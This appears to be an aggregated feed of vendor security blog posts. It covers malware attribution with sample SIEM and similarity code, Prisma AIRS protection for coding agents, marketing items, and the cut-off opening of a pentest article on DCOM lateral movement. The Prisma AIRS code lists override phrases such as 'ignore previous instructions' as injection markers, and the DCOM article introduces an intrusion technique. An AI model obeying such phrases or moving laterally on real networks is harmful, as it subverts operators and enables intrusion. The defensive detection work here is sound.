Not every cybersecurity practitioner thinks it's worth the effort to figure out exactly who's pulling the strings behind the malware hitting their company. The typical incident investigation algorithm goes something like this: analyst finds a suspicious file → if the antivirus didn't catch it, puts it into a sandbox to test → confirms some malicious activity → adds the hash to the blocklist → goes for a coffee break. These are the go-to steps for many cybersecurity professionals — especially when they're swamped with alerts, or don't quite have the forensic skills to unravel a complex attack thread by thread. However, when dealing with a targeted attack, this approach is a one-way ticket to disaster — and here's why.

If an attacker is playing for keeps, they rarely stick to a single attack vector. There's a good chance the malicious file has already played its part in a multi-stage attack and is now all but useless to the attacker. Meanwhile, the adversary has already dug deep into corporate infrastructure and is busy operating with an entirely different set of tools. To clear the threat for good, the security team has to uncover and neutralize the entire attack chain.

But how can this be done quickly and effectively before the attackers manage to do some real damage? One way is to dive deep into the context. By analyzing a single file, an expert can identify exactly who's attacking their company, quickly find out which other tools and tactics that specific group employs, and then sweep infrastructure for any related threats. There are plenty of threat intelligence tools out there for this, but I'll show you how it works using our Kaspersky Threat Intelligence Portal.

A practical example of why attribution matters

Let's say we upload a piece of malware we've discovered to a threat intelligence portal, and learn that it's typically used by, say, the MysterySnail group. What does that actually tell us? Let's look at the available intel:

MysterySnail group information

First off, these attackers target government institutions in both Russia and Mongolia. Theyโ€™re a Chinese-speaking group that typically focuses on espionage. According to their profile, they establish a foothold in infrastructure and lay low until they find something worth stealing. We also know that they typically exploit the vulnerability CVE-2021-40449. What kind of vulnerability is that?

CVE-2021-40449 vulnerability details

As we can see, itโ€™s a privilege escalation vulnerability โ€” meaning itโ€™s used after hackers have already infiltrated the infrastructure. This vulnerability has a high severity rating and is heavily exploited in the wild. So what software is actually vulnerable?

Vulnerable software

Got it: Microsoft Windows. Time to double-check if the patch that fixes this hole has actually been installed. Alright, besides the vulnerability, what else do we know about the hackers? It turns out they have a peculiar way of checking network configurations โ€” they connect to the public site 2ip.ru:

Technique details

So it makes sense to add a correlation rule to SIEM to flag that kind of behavior.
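The concrete rule depends on your SIEM's query language, but the underlying logic is simple enough to sketch in Python. The log format, field names and sample entries below are invented for illustration, not a real detection rule:

```python
import re

# Hypothetical proxy-log lines; the key=value field layout is an assumption.
LOG_LINES = [
    "2026-02-02T10:14:03 host=ws-042 user=jdoe dest=update.microsoft.com action=allow",
    "2026-02-02T10:15:11 host=ws-042 user=jdoe dest=2ip.ru action=allow",
    "2026-02-02T10:16:45 host=srv-db1 user=svc_backup dest=2ip.ru action=allow",
]

# Destinations associated with the group's network-discovery technique.
WATCHED_DESTINATIONS = {"2ip.ru"}

def flag_suspicious(lines):
    """Return (host, user, dest) tuples for connections to watched destinations."""
    hits = []
    for line in lines:
        # Parse key=value pairs out of each log line.
        fields = dict(re.findall(r"(\w+)=(\S+)", line))
        if fields.get("dest") in WATCHED_DESTINATIONS:
            hits.append((fields["host"], fields["user"], fields["dest"]))
    return hits

for host, user, dest in flag_suspicious(LOG_LINES):
    print(f"ALERT: {host} ({user}) contacted {dest}")
```

In practice you would run the equivalent query over proxy or DNS telemetry and route hits into the alert pipeline; legitimate software rarely has a reason to query a public IP-checking service from a server.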

Nowโ€™s the time to read up on this group in more detail and gather additional indicators of compromise (IoCs) for SIEM monitoring, as well as ready-to-use YARA rules (structured text descriptions used to identify malware). This will help us track down all the tentacles of this kraken that might have already crept into corporate infrastructure, and ensure we can intercept them quickly if they try to break in again.

Additional MysterySnail reports

Kaspersky Threat Intelligence Portal provides a ton of additional reports on MysterySnail attacks, each complete with a list of IoCs and YARA rules. These YARA rules can be used to scan all endpoints, and those IoCs can be added into SIEM for constant monitoring. While weโ€™re at it, letโ€™s check the reports to see how these attackers handle data exfiltration, and what kind of data theyโ€™re usually hunting for. Now we can actually take steps to head off the attack.

And just like that, MysterySnail: the infrastructure is now tuned to find you and respond immediately. No more spying for you!

Malware attribution methods

Before diving into specific methods, we need to make one thing clear: for attribution to actually work, the threat intelligence provider needs a massive knowledge base of the tactics, techniques, and procedures (TTPs) used by threat actors. The scope and quality of these databases can vary wildly among vendors. In our case, before even building our tool, we spent years tracking known groups across various campaigns and logging their TTPs, and we continue to actively update that database today.

With a TTP database in place, the following attribution methods can be implemented:

  1. Dynamic attribution: identifying TTPs through the dynamic analysis of specific files, then cross-referencing that set of TTPs against those of known hacking groups
  2. Technical attribution: finding code overlaps between specific files and code fragments known to be used by specific hacking groups in their malware
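At its core, the first method is set comparison: collect the TTPs observed while detonating the sample, then score them against each group's known profile. A minimal sketch, with hypothetical group profiles and MITRE ATT&CK technique IDs chosen for illustration:

```python
# Hypothetical group profiles keyed by MITRE ATT&CK technique IDs;
# real TTP databases are far larger and vendor-specific.
GROUP_TTPS = {
    "MysterySnail": {"T1068", "T1016", "T1071.001", "T1055"},
    "GroupB":       {"T1566.001", "T1204.002", "T1059.001"},
    "GroupC":       {"T1068", "T1059.001", "T1105"},
}

def rank_groups(observed, profiles):
    """Rank groups by Jaccard similarity between observed and profiled TTPs."""
    scores = []
    for group, ttps in profiles.items():
        overlap = observed & ttps
        union = observed | ttps
        scores.append((group, len(overlap) / len(union)))
    return sorted(scores, key=lambda s: s[1], reverse=True)

# TTPs extracted from a sandbox run of the sample.
observed = {"T1068", "T1016", "T1055"}
for group, score in rank_groups(observed, GROUP_TTPS):
    print(f"{group}: {score:.2f}")
```

A high score here is a lead, not a verdict: distinct groups share many common techniques, which is why TTP overlap alone is rarely enough for confident attribution.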

Dynamic attribution

Identifying TTPs during dynamic analysis is relatively straightforward to implement; in fact, this functionality has been a staple of every modern sandbox for a long time. Naturally, all of our sandboxes also identify TTPs during the dynamic analysis of a malware sample:

TTPs of a malware sample

The core of this method lies in categorizing malware activity using the MITRE ATT&CK framework. A sandbox report typically contains a list of detected TTPs. While this is highly useful data, it's not enough for full-blown attribution to a specific group. Trying to identify the perpetrators of an attack using just this method is a lot like the ancient Indian parable of the blind men and the elephant: each man touches a different part of the elephant and tries to deduce what's in front of him from that alone. The one touching the trunk thinks it's a python; the one touching the side is sure it's a wall; and so on.

Blind men and an elephant

Technical attribution

The second attribution method is handled via static code analysis (though keep in mind that this type of attribution is always problematic). The core idea here is to cluster even slightly overlapping malware files based on specific unique characteristics. Before analysis can begin, the malware sample must be disassembled. The problem is that alongside the informative and useful bits, the recovered code contains a lot of noise. If the attribution algorithm takes this non-informative junk into account, any malware sample will end up looking similar to a great number of legitimate files, making quality attribution impossible. On the flip side, trying to only attribute malware based on the useful fragments but using a mathematically primitive method will only cause the false positive rate to go through the roof. Furthermore, any attribution result must be cross-checked for similarities with legitimate files โ€” and the quality of that check usually depends heavily on the vendorโ€™s technical capabilities.
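One way to picture the idea (a toy sketch, not Kaspersky's patented algorithm): strip boilerplate instructions from the disassembly, then compare n-grams over what remains. The instruction streams and noise list below are invented for illustration:

```python
# Boilerplate prologue/epilogue instructions treated as non-informative noise.
NOISE = {"nop", "push ebp", "mov ebp, esp", "pop ebp", "ret"}

def ngrams(instructions, n=3):
    """Build the set of instruction n-grams, skipping noise instructions."""
    cleaned = [i for i in instructions if i not in NOISE]
    return {tuple(cleaned[i:i + n]) for i in range(len(cleaned) - n + 1)}

def similarity(a, b, n=3):
    """Jaccard similarity of instruction n-grams, after noise filtering."""
    ga, gb = ngrams(a, n), ngrams(b, n)
    if not ga or not gb:
        return 0.0
    return len(ga & gb) / len(ga | gb)

# Toy instruction streams standing in for disassembled functions.
sample = ["push ebp", "mov ebp, esp", "xor eax, eax", "mov ecx, 0x40449",
          "call decrypt_cfg", "jmp loader_stub", "pop ebp", "ret"]
known  = ["push ebp", "mov ebp, esp", "xor eax, eax", "mov ecx, 0x40449",
          "call decrypt_cfg", "jmp other_stub", "nop", "ret"]

print(f"similarity: {similarity(sample, known):.2f}")
```

Without the noise filter, the shared prologue and epilogue would inflate the score for almost any pair of compiled functions; a production engine additionally cross-checks every candidate match against a corpus of legitimate files, as described below.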

Kasperskyโ€™s approach to attribution

Our products leverage a unique database of malware associated with specific hacking groups, built over more than 25 years. On top of that, we use a patented attribution algorithm based on static analysis of disassembled code. This allows us to determine โ€” with high precision, and even a specific probability percentage โ€” how similar an analyzed file is to known samples from a particular group. This way, we can form a well-grounded verdict attributing the malware to a specific threat actor. The results are then cross-referenced against a database of billions of legitimate files to filter out false positives; if a match is found with any of them, the attribution verdict is adjusted accordingly. This approach is the backbone of the Kaspersky Threat Attribution Engine, which powers the threat attribution service on the Kaspersky Threat Intelligence Portal.

Closing the Cyber Security Skills Gap: Check Point Partners with CompTIA

27 January 2026 at 13:00

The cyber security industry faces a critical challenge: a growing skills gap that leaves organizations exposed to increasingly sophisticated threats. Businesses need qualified professionals who can secure systems and respond effectively, but finding and training those experts remains a global concern. To address this challenge, Infinity Global Services, which delivers practical learning designed to build real-world cyber security expertise, has partnered with CompTIA, a global leader in IT and cyber security education. This collaboration combines Infinity Global Servicesโ€™ hands-on training approach with CompTIAโ€™s globally recognized certifications, creating a powerful pathway for professionals to advance their careers and organizations to build [โ€ฆ]

The post Closing the Cyber Security Skills Gap: Check Point Partners with CompTIA appeared first on Check Point Blog.

Prisma AIRS Secures the Power of Factoryโ€™s Software Development Agents

The New Frontier of Agentic Development: Accelerating Developer Productivity

The world of software development is undergoing a rapid transformation, driven by the rise of AI agents and autonomous tools. Factory is advancing this shift through agent-native development, a new paradigm where developers focus on high-level design and agents, called Droids, handle the execution. Designed to support work across the software development lifecycle, these agents enable a new mode of development, delivering significant gains in speed and productivity, without sacrificing developer control.

As developer workflows increasingly rely on autonomous development agents, the way software is built evolves. This shift introduces important security considerations, such as prompt injection, sensitive data loss, unsafe URL access and malicious code execution, which, if left unaddressed, can undermine the very benefits these agents offer. Accelerating productivity depends not just on deploying agents, but on deploying them securely. This is where Palo Alto Networks, with its purpose-built AI security platform, Prisma® AIRS™, plays a critical role.

The Productivity Paradox: Where Agents Introduce Risk

Autonomous agents operating across the software development lifecycle accelerate developer productivity, while also introducing a complex, language-driven threat surface that traditional security tools are not equipped to handle. As a result, new risks emerge, such as prompt injection and secret leakage, that extend beyond the visibility and control assumptions of traditional security approaches. Addressing these considerations is essential to preserving the benefits that agentic development provides.

Recognizing this shift, Palo Alto Networks has introduced targeted capabilities to accelerate secure development workflows. These efforts focus on three critical defense areas: preventing prompt injection, blocking sensitive data leaks and enabling robust malicious code detection capabilities, all of which are necessary to secure the full lifecycle of agent-driven systems.

The Solution: Securing Agentic Workflows for Acceleration

The solution is designed to convert security challenges directly into deployment confidence, dramatically accelerating productivity. By natively integrating Prisma AIRS within Factoryโ€™s Droid Shield Plus, the platform is able to inspect all large language model (LLM) interactions, including prompts, responses and subsequent tool calls, to enable comprehensive security across each interaction with the agent.

Prisma AIRS is a comprehensive platform designed to provide organizations with the visibility and control needed to safeguard AI agents across any environment. The platform continuously monitors agent behavior in real time to detect and prevent threats unique to agent-driven systems.

Droid Shield Plus key features: prompt injection detection, advanced secrets scanning, sensitive data protection, malicious code detection.
Droid Shield Plus, powered by Palo Alto Networks

How Security Drives Speed

Embedding security natively into the Factory platform enables two crucial outcomes. To start, it delivers a secure, agent-native development experience for every developer, fostering immediate trust in the integrity of the generated code and documentation. This assurance removes friction often associated with AI-powered workflows, which can accelerate enterprise adoption and scaling of the Factory platform across the organization.

When developers can trust the agents and the integrity of the generated code and documentation, they can innovate faster and deploy with greater confidence. Instead of waiting for security reviews or dealing with fragmentation, security is woven seamlessly into the development lifecycle.

Sequence of events from user to user with Prisma AIRS and Factory AI.
Factory-Prisma AIRS Integration Flow

The integration follows a clear API Intercept design pattern:

  • When a user enters a prompt or initiates work in Factory, Prisma AIRS intercepts the workflow. If a malicious prompt is detected, the platform can add logic to coach or block the user.
  • Similarly, after the LLM generates code, Prisma AIRS intercepts the generated content. If secrets are detected, the platform again adds logic to coach or block the result before it reaches Factory or the user.

This real-time inspection of prompts and generated code enables development teams to be protected against threats, such as privilege escalation, prompt injection and malicious code execution, without disrupting developer velocity.
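The intercept pattern itself can be sketched in a few lines. Everything below (function names, detection heuristics, patterns) is an illustrative assumption rather than the Prisma AIRS API:

```python
import re

# Illustrative detectors only; real platforms use far richer models and rules.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                      # AWS-style access key id
    re.compile(r"-----BEGIN (?:RSA )?PRIVATE KEY-----"),  # embedded private key
]
INJECTION_MARKERS = ["ignore previous instructions", "disregard your system prompt"]

def inspect_prompt(prompt):
    """Block the request if the prompt looks like an injection attempt."""
    lowered = prompt.lower()
    if any(marker in lowered for marker in INJECTION_MARKERS):
        return "block", "possible prompt injection"
    return "allow", ""

def inspect_output(generated):
    """Block the response if the generated content contains embedded secrets."""
    if any(p.search(generated) for p in SECRET_PATTERNS):
        return "block", "secret detected in generated content"
    return "allow", ""

def guarded_call(prompt, llm):
    """Intercept both sides of the LLM exchange, coaching or blocking as needed."""
    verdict, reason = inspect_prompt(prompt)
    if verdict == "block":
        return f"[coached: {reason}]"
    output = llm(prompt)
    verdict, reason = inspect_output(output)
    if verdict == "block":
        return f"[blocked: {reason}]"
    return output

# Stand-in for the model call; emits a fake AWS-style key to trip the scanner.
fake_llm = lambda p: 'aws_key = "AKIA' + "A" * 16 + '"'
print(guarded_call("write a config loader", fake_llm))
```

The key property of the pattern is that both the prompt and the generated content pass through the same chokepoint, so policy can be enforced on either side without changing the developer's workflow.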

Deploy Bravely

Prisma AIRS 2.0 establishes a unified foundation for scalable and secure AI innovation. By combining Factoryโ€™s agent-native development platform with the threat detection capabilities of Palo Alto Networks Prisma AIRS, organizations gain a powerful advantage. Together, this approach helps organizations adopt agentic development with confidence by embedding security directly into the development experience.

For enterprises looking to confidently scale AI automation and realize the immense productivity gains offered by Factoryโ€™s Droids, integrating Prisma AIRS is the next step. This combined approach enables teams to "Deploy Bravely." To learn more about this strategic partnership and integration, see our latest integration announcement and review the Droid Shield Plus integration documentation.


Key Takeaways for Secure Agentic Development

When adopting Factory with Prisma AIRS, enterprises realize immediate benefits that accelerate their AI strategy:

  1. Specialized Threat Defense
    Enterprises gain real-time, targeted protection against agent-specific threats, specifically prompt injection attacks and data leaks, which legacy tools cannot address.
  2. Native, Seamless Security
    Security moves from a fragmented review process to continuous, automated defense via API interception, enabling compliance without slowing development velocity.
  3. Deployment Confidence
    The native integration transforms security risks into operational assurance, accelerating the large-scale enterprise adoption and scaling of your Factory agent-native automation initiatives.

The post Prisma AIRS Secures the Power of Factoryโ€™s Software Development Agents appeared first on Palo Alto Networks Blog.

Palo Alto Networks Announces Support for NVIDIA Enterprise AI Factory

6 January 2026 at 00:01

Artificial intelligence has become the primary engine of market leadership. To compete, enterprises are moving from general-purpose computing to AI factories: specialized infrastructures designed to manage the entire lifecycle of AI. However, this transition requires robust security without sacrificing performance and efficiency.

We are proud to announce that Palo Alto Networks Prisma® AIRS™, accelerated on the NVIDIA BlueField data processing unit (DPU), is now part of the NVIDIA Enterprise AI Factory validated design.

The integrated solution embeds zero trust security directly into the AI infrastructure, providing comprehensive protection without impacting AI performance. By deploying Palo Alto Networks Prisma® AIRS™ Network Intercept directly onto the NVIDIA BlueField and extending to the cloud, Prisma AIRS establishes an essential zero trust governance fabric for the AI factory, enabling enterprises to accelerate innovation while maintaining control.

This critical architectural shift enables optimal AI performance and infrastructure efficiency by offloading security processing to an isolated domain, while leveraging the DPU's hardware acceleration via NVIDIA DOCA to enforce security policies at line speed. The implementation also leverages real-time workload information captured using DOCA Argus, which is then passed to Cortex XSIAM®, where it drives AI-driven responses through the Cortex XSOAR® orchestration platform.

Rich Campagna, SVP Product Management, Palo Alto Networks said:

The AI Factory is the new engine for value creation, and securing it is a board-level imperative. The validation of Palo Alto Networks Prisma AIRS accelerated with NVIDIA BlueField within the NVIDIA Enterprise AI Factory enables a new security architecture for the AI era. We are embedding trust directly into the infrastructure, giving leaders the confidence to safeguard their proprietary intelligence and deploy AI bravely.

Kevin Deierling, senior vice president of Networking at NVIDIA said:

AI is transforming every industry and security must evolve to protect AI factories. To be scalable, security must be distributed and embedded within the AI infrastructure. This is achieved with NVIDIA BlueField running Palo Alto Networks Prisma AIRS to deliver robust, runtime security for the AI factory, with optimal AI performance and efficiency.

Deploy AI Bravely with a Future-Proof Foundation

The Future of Secure AI Factories

NVIDIA AI Factory with Prisma AIRS and Strata.

In addition to deploying Palo Alto Networks Prisma AIRS on NVIDIA BlueField in a distributed model, itโ€™s essential to maintain a centralized Hyperscale Security Firewall (HSF) cluster at the ingress and egress points of the AI factory to enforce a defense-in-depth strategy. Beyond network segmentation, individual workloads can selectively route traffic through hyperscale clusters to detect advanced application-layer threats and prevent lateral movement. These hyperscale firewall clusters scale elastically with demand, delivering session resiliency and the high availability required for critical AI operations.

This architecture fundamentally improves the Total Cost of Ownership (TCO) for AI infrastructure. By isolating security functions on BlueField, enterprises enable 100% of host computing resources to be dedicated to AI applications. This elimination of resource contention allows the AI Factory to maximize token throughput and capital efficiency.

This validated design is the blueprint for immediate efficiency. It provides a seamless path for enterprises to shift from general-purpose clusters to secure AI factory infrastructure without costly overhauls. More importantly, this collaboration establishes an unparalleled roadmap for future-proofing your investment. By securing operations with the high-performance NVIDIA BlueField-3 today, the architecture is inherently ready for the next generation, NVIDIA BlueField-4. This forward compatibility helps AI factories immediately handle gigascale demands, scaling up to 6X the compute power and doubling the bandwidth when BlueField-4 becomes available.

The inclusion of the Palo Alto Networks Prisma AIRS platform in the NVIDIA Enterprise AI Factory Validated Design bolsters enterprise AI security. By establishing the zero trust governance fabric of Prisma AIRS runtime security on NVIDIA BlueField, organizations gain a comprehensive defense. Proprietary and sensitive data is secured throughout the entire stack, and models are protected from adversarial threats, such as prompt injection attacks. With Prisma AIRS, the world's most comprehensive AI security platform, leaders gain the confidence to innovate and deploy AI bravely. This validated design is the essential blueprint for securely accelerating your market leadership without compromising security.

Join our "How to Secure the AI Factory" breakout session at NVIDIA GTC 2026, March 16-19, in San Jose, CA to hear more about this transformative solution and accelerate your AI innovation securely.

The post Palo Alto Networks Announces Support for NVIDIA Enterprise AI Factory appeared first on Palo Alto Networks Blog.

Opening the Automation Garden: API Request & Webhook Trigger in Infinity Playblocks

9 January 2026 at 13:00

Todayโ€™s security teams work in complex, multi-tool environments. Alerts flow from SIEMs, tickets are created in ITSM platforms, actions occur in cloud and network controls, and workflows span countless third-party services. To keep pace, automation must be open, flexible, and seamlessly connected across every system that matters. Weโ€™re excited to introduce two powerful new capabilities in Infinity Playblocks that take us one step closer to a truly open automation ecosystem: API Request Step and Webhook Trigger. Together, they unlock a new open garden approach to security automation โ€“ where Infinity Playblocks seamlessly integrates with any system, inbound or outbound, without [โ€ฆ]

The post Opening the Automation Garden: API Request & Webhook Trigger in Infinity Playblocks appeared first on Check Point Blog.

The Power of Unity

Transforming Real-Time Protection with Cloud-Delivered Security Services

Discover how unified prevention provides IT leaders with real-time protection across every attack surface.

The line between innovation and exposure has never been blurrier in today's hyperconnected digital world. Every new device, application and cloud workload expands the modern attack surface, creating endless opportunities for adversaries who are scaling faster and becoming more sophisticated than ever before. The threat landscape is no longer defined by isolated malware or phishing emails. The modern attack surface has evolved into a dynamic, adaptive ecosystem, driven by automation and artificial intelligence. Traditional security is no longer enough against AI-powered adversaries; protecting the modern attack surface demands a unified, intelligent Cloud-Delivered Security Services (CDSS) platform.

Attackers have learned to weaponize the same innovations that once gave defenders an advantage. Generative AI now enables them to craft convincing phishing messages, generate polymorphic malware that changes with every delivery, and automate reconnaissance at an unprecedented scale. Ransomware groups operate with the speed and agility of modern startups, using AI to identify weaknesses while staying one step ahead of detection. The result is an era where breaches unfold in minutes rather than days. Organizations are left with little room for error, underscoring the urgent need for security that goes beyond traditional approaches.

The Power of a Unified, Cloud-Delivered Security Service Platform

The power of our Cloud-Delivered Security Services lies in our ability to bring together every layer of protection into one intelligent, connected system. This unified platform combines Advanced Threat Prevention, Advanced WildFire® (AWF), Advanced DNS Security (ADNS) and Advanced URL Filtering (AURL) into a single AI-powered fabric that operates at the speed of the cloud.

Powered by Precision AI®, this framework delivers real-time contextual awareness across every stage of the attack lifecycle. It continuously analyzes billions of signals across networks, users and applications to transform raw data into actionable insights. This capability enables organizations to move from reactive detection to proactive prevention, stopping threats before they can disrupt operations.

Every day, our CDSS services analyze up to 5.43 billion new events, detect nearly 8.95 million never-before-seen attacks, and block up to 30.9 billion threats inline. This scale of visibility is strengthened by AI that's trained on shared threat data from more than 70,000 customers, creating a powerful network effect that delivers patient-zero prevention everywhere. This depth of intelligence provides the visibility and context needed to understand and stop even the most sophisticated attacks as they evolve.

CDSS services prevent zero-day injection, evasive malware, phishing and DNS hijacking attacks.
CDSS Advanced Core Security Services

Shared telemetry flows naturally across services, helping ensure threats are detected and prevented without operating in silos. A phishing domain identified by Advanced DNS Security can immediately inform Advanced URL Filtering to block the malicious site. When Advanced WildFire uncovers a new zero-day technique or malicious artifact, that intelligence is shared instantly across the CDSS intelligence layer. Inline services, like Advanced Threat Prevention and Advanced URL Filtering, are enabled to strengthen protections in real time without manual intervention.

For IT leaders and security teams, this unified approach delivers comprehensive visibility and protection that keeps pace with their environment. Continuous intelligence adapts as conditions change, reducing complexity and improving operational efficiency. With consistent policy enforcement, faster decision-making and unified management across the enterprise, organizations can shift their focus from maintenance to innovation and growth.

The Moment Traditional Security Stopped Being Enough

There was a time when traditional network security was enough. Perimeter defenses and signature-based tools could reliably detect and block most threats before they caused harm. For years, this layered approach gave organizations a sense of confidence and control. But that moment has passed.

Our Unit 42® team has found that attacks are now faster, more sophisticated and more disruptive than ever, with 86% of major incidents in 2024 resulting in business disruption. This shift underscores how quickly traditional defenses are being outpaced and why yesterday's security models no longer match today's threat landscape.

Traditional, siloed architectures simply cannot keep up with modern attackers. What once served as a strong defense is now outmatched by adversaries who use AI to move faster and slip through the cracks of static security controls. Attackers no longer need to rely on predictable patterns or known exploits. They can use machine learning to probe defenses, mimic legitimate behavior and disguise malicious activity within normal traffic, allowing them to bypass systems once considered unbreakable.

Older security products that depend on static signatures or manual policy updates cannot match this speed and scale. They respond to what has already happened, not to what is happening right now. By the time a new rule is written or a patch is applied, the threat has already evolved. Fragmented visibility and delayed response times give adversaries the upper hand, leaving IT teams defending blind against threats that adapt and shift faster than their defenses ever could.

In an effort to compensate, many organizations continue to add more tools: one for web filtering, one for DNS, one for malware analysis and one for data protection. While each solution provides value, they rarely work together. The result is an overcomplicated ecosystem of disconnected products that create visibility gaps, duplicate alerts, inconsistent policy enforcement and operational overhead. These gaps are exactly where attackers find their opportunity.

The moment traditional security stopped being enough was the moment attackers learned to think and move like machines. The rise of AI-powered threats marked the end of static defense and the beginning of a new kind of warfare, one that demands prevention that is predictive, adaptive and unified.

Today, enterprises don't need more point products. They need a single, intelligent security fabric so they can see, understand and act across every vector, from DNS to SaaS to endpoint, in one coordinated motion. Attackers increasingly weaponize GenAI to craft more evasive phishing pages, malware and domain infrastructures. So, security teams must rely on defenses that can counter these techniques in real time by effectively battling AI with AI.

That is where cloud-delivered security services (CDSS) redefine the game, bringing AI-driven prevention to every corner of the network.

Your Defense Is Only as Strong as Whatโ€™s Enabled

Having the proper security tools is only part of the equation. Real protection comes when those tools are fully enabled, integrated and working together to secure the organization. Cloud-delivered security services deliver their greatest value when they are live and continuously analyzing traffic, sharing intelligence and adapting in real time to support the business.

Too often, organizations have the right capabilities in place but leave them underutilized or inactive. Protection begins the moment each service is turned on and working in unison to deliver real-time prevention at scale. Ensuring that these capabilities are fully enabled and actively defending the network is what turns investment into impact.

Prevention is about readiness, not reaction. The most resilient organizations are those that activate early, integrate completely and allow automation to amplify what human oversight cannot. When IT leaders enable Advanced Threat Prevention, AWF, ADNS and AURL, prevention becomes continuous, intelligent and aligned with the pace of modern threats.

The power of our CDSS services lies in both their advanced technology and the unity they create. Together, these services form an intelligent defense that connects detection, prevention and response into one seamless operation, all powered by Precision AI.

Powering all core security services with Precision AI.
Precision AI Foundation for Advanced Security Services

Now, with AI reshaping both innovation and risk, CDSS helps organizations stay confidently ahead. IT leaders who enable these capabilities strengthen visibility, simplify operations and elevate their overall security posture.

Fully enable your defenses and have them ready to prevent threats at each stage of the attack lifecycle. Learn more about activating CDSS through Strata™ Cloud Manager or speak with your Palo Alto Networks representative to see how unified, AI-powered prevention can strengthen your organization's security posture.


Key Takeaways

  1. Traditional Security Is Insufficient Against Modern Threats
    The rise of AI and automation has created an era in which attackers move faster and are more sophisticated than traditional, siloed security products can handle, leading to an increasing number of major incidents that disrupt business.
  2. Unified Cloud-Delivered Security Services (CDSS) Are Necessary for Proactive Prevention
    Protecting the modern attack surface requires a single, intelligent, connected CDSS platform that unifies all layers of protection (e.g., Advanced Threat Prevention, AWF, ADNS, AURL) into an AI-powered fabric, enabling proactive, real-time prevention rather than reactive detection.
  3. Real Protection Depends on Full Activation and Integration
    Having the right security tools is only part of the solution. The greatest value and protection are realized when your fully enabled CDSS is integrated and working in unison to continuously analyze traffic and share intelligence.

The post The Power of Unity appeared first on Palo Alto Networks Blog.

Cyber Resilience Starts with Training: Why Skills Define Security Success

30 December 2025 at 13:00

Define Security Success Organizations face an escalating threat landscape and a widening cyber security skills gap. Compliance-driven training alone cannot prepare teams for real-world challenges like incident response, SOC operations, and threat hunting. Without robust, practical training, defenses weaken, and vulnerabilities multiply. Recent data from Cybrary – a leading cyber security training platform – shows how modern approaches are transforming readiness. Cybrary specializes in practical, role-based learning for security professionals. Through its partnership with Check Point's Infinity Global Services, organizations gain access to structured programs that combine industry-recognized certifications, hands-on labs, and customized learning paths. The Impact of Cyber Security […]

The post Cyber Resilience Starts with Training: Why Skills Define Security Success appeared first on Check Point Blog.

Yet another DCOM object for lateral movement

19 December 2025 at 09:00

Introduction

If you're a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects.

Over the years, many different DCOM objects have been discovered. Some rely on native Windows components, others depend on third-party software such as Microsoft Office, and some are undocumented objects found through reverse engineering. While certain objects still work, others no longer function in newer versions of Windows.

This research presents a previously undescribed DCOM object that can be used for both command execution and potential persistence. This new technique abuses older initial access and persistence methods through Control Panel items.

First, we will discuss COM technology. After that, we will review the current state of the Impacket dcomexec script, focusing on objects that still function, and discuss potential fixes and improvements, then move on to techniques for enumerating objects on the system. Next, we will examine Control Panel items, how adversaries have used them for initial access and persistence, and how these items can be leveraged through a DCOM object to achieve command execution.

Finally, we will cover detection strategies to identify and respond to this type of activity.

COM/DCOM technology

What is COM?

COM stands for Component Object Model, a Microsoft technology that defines a binary standard for interoperability. It enables the creation of reusable software components that can interact at runtime without the need to compile COM libraries directly into an application.

These software components operate in a client–server model. A COM object exposes its functionality through one or more interfaces. An interface is essentially a collection of related member functions (methods).

COM also enables communication between processes running on the same machine by using local RPC (Remote Procedure Call) to handle cross-process communication.

Terms

To ensure a better understanding of its structure and functionality, let's review COM-related terminology.

  1. COM interface
    A COM interface defines the functionality that a COM object exposes. Each COM interface is identified by a unique GUID known as the IID (Interface ID). All COM interfaces can be found in the Windows Registry under HKEY_CLASSES_ROOT\Interface, where they are organized by GUID.
  2. COM class (COM CoClass)
    A COM class is the actual implementation of one or more COM interfaces. Like COM interfaces, classes are identified by unique GUIDs, but in this case the GUID is called the CLSID (Class ID). This GUID is used to locate the COM server and activate the corresponding COM class.

    All COM classes must be registered in the registry under HKEY_CLASSES_ROOT\CLSID, where each class's GUID is stored. Under each GUID, you may find multiple subkeys that serve different purposes, such as:

    • InprocServer32/LocalServer32: Specifies the system path of the COM server where the class is defined. InprocServer32 is used for in-process servers (DLLs), while LocalServer32 is used for out-of-process servers (EXEs). We'll describe this in more detail later.
    • ProgID: A human-readable name assigned to the COM class.
    • TypeLib: A binary description of the COM class (essentially documentation for the class).
    • AppID: Used to describe security configuration for the class.
  3. COM server
    A COM server is the module where a COM class is defined. The server can be implemented as an EXE, in which case it is called an out-of-process server, or as a DLL, in which case it is called an in-process server. Each COM server has a unique file path or location in the system. Information about COM servers is stored in the Windows Registry. The COM runtime uses the registry to locate the server and perform further actions. Registry entries for COM servers are located under the HKEY_CLASSES_ROOT root key for both 32- and 64-bit servers.
Component Object Model implementation


Client–server model

  1. In-process server
    In the case of an in-process server, the server is implemented as a DLL. The client loads this DLL into its own address space and directly executes functions exposed by the COM object. This approach is efficient since both client and server run within the same process.
    In-process COM server


  2. Out-of-process server
    Here, the server is implemented and compiled as an executable (EXE). Since the client cannot load an EXE into its address space, the server runs in its own process, separate from the client. Communication between the two processes is handled via ALPC (Advanced Local Procedure Call) ports, which serve as the RPC transport layer for COM.
Out-of-process COM server


What is DCOM?

DCOM is an extension of COM where the D stands for Distributed. It enables the client and server to reside on different machines. From the user's perspective, there is no difference: DCOM provides an abstraction layer that makes both the client and the server appear as if they are on the same machine.

Under the hood, however, COM uses TCP as the RPC transport layer to enable communication across machines.

Distributed COM implementation


Certain requirements must be met to extend a COM object into a DCOM object. The most important one for our research is the presence of the AppID subkey in the registry, located under the COM CLSID entry.

The AppID value contains a GUID that maps to a corresponding key under HKEY_CLASSES_ROOT\AppID. Several subkeys may exist under this GUID. Two critical ones are:

  • AccessPermission: controls access permissions.
  • LaunchPermission: controls activation permissions.

These registry settings grant remote clients permissions to activate and interact with DCOM objects.
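
As a concrete illustration of this layout, a DCOM-enabled class might look like the following in .reg export form. The GUID and server path here are entirely made up, and the AccessPermission/LaunchPermission values (which are binary security descriptors) are shown only as placeholders:

```
Windows Registry Editor Version 5.00

; COM class: the AppID value links the CLSID to its DCOM security settings
[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}]
@="ExampleCoClass"
"AppID"="{11111111-2222-3333-4444-555555555555}"

; Out-of-process server hosting the class
[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\LocalServer32]
@="C:\\Windows\\System32\\example.exe"

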